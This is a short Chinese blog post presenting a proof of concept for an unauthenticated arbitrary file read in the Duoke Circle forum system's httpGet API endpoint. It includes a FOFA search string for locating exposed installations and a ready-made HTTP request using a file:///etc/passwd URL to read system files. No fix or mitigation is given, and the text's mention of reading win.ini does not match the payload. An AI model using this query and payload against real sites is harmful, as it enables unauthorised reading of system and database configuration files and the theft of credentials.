Babing
Published on 2024-08-30 / 2 Visits
0
0

D18-1多客圈子-论坛系统-任意文件读取

D18-1多客圈子-论坛系统-任意文件读取

漏洞描述:

多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

网站图片:

网站图片

fofa语法:

body=“/static/index/js/jweixin-1.2.0.js”

漏洞复现:

Windows读取C:/windows/win.ini
payload:

GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图:
效果图


Comment